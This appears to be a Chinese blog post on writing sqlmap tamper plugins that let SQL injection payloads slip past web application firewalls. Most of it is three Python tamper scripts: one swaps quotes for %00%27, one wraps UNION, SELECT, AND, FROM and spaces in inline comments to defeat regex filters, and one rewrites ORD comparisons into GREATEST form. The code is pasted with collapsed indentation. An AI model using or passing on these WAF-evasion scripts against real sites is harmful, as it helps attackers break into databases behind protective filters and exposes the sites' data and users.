简述tamper 编写

  • A+
所属分类:颓废's Blog
摘要

下面是一个简单版的payload 代码:

tamper是sqlmap的一个集合的专门用来过WAF的插件,近期对这个比较感兴趣,就收集收集整理整理下。

下面是一个简单版的payload 代码:

from lib.core.enums import PRIORITY   __priority__ = PRIORITY.LOW   def dependencies():     pass   def tamper(payload,**kwargs):     if payload:   payload = payload.replace('/'', "%00%27")   print payload return payload

第一行和三行,都是制定插件的优先级的,一般是起作用于多个插件之间排序用的。

Dependencies() 这个函数不清楚而且大部分都是 pass ,所以我也就不去注意了。

Def tamper(payload,**kwargs)是这个插件的核心函数,payload 是主要的传递参数,**kwargs 也用少,没仔细测过。

用过 if 判断这个 payload 是否存有参数,如果有,那么把里面的 单引号’替换为 %00%27 。

最后返回函数本身这个 payload ,那个print 是我测试的时候输出看看的。

一般大家过狗的时候,都是使用 /**/,在注释里面添加一些特殊符号,等等来绕过正则,那么简单的编写可以这样:

from lib.core.enums import PRIORITY   __priority__ = PRIORITY.LOW   def dependencies():     pass   def tamper(payload,**kwargs):     if payload:   csfh = "/*@^.^@*/"   payload = payload.replace('UNION',csfh+"UNION"+csfh)   payload = payload.replace('SELECT',csfh+"SELECT"+csfh)   payload = payload.replace('AND',csfh+"AND"+csfh)   payload = payload.replace('=',csfh+"="+csfh)   payload = payload.replace(' ',csfh)   payload = payload.replace('FROM',csfh+"FROM"+csfh) return payload

这个主要是把联合查询的周围都加上/**/来绕过。

当然如果自己写,肯定不止这些了,可以通过正则把一些语句正则出来,然后再去替换自己需要修改的SQL语句。

#!/usr/bin/env python   Import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW   def dependencies():  pass   def tamper(payload, **kwargs):     retVal = payload     if payload:         match = re.search(r"(if/()(ORD/(.*?/))>(/d+)", payload, re.I)         if match:             _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(2), match.group(3), match.group(2))             retVal = retVal.replace(match.group(0), _) return retVal

这个是乌云漏洞库一个58的漏洞,白帽子自己写了一个过WAF的方法插件。

不过这种绕过方法就得靠自己扎实的SQL语法和正则能力了。

作者: shiyan

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: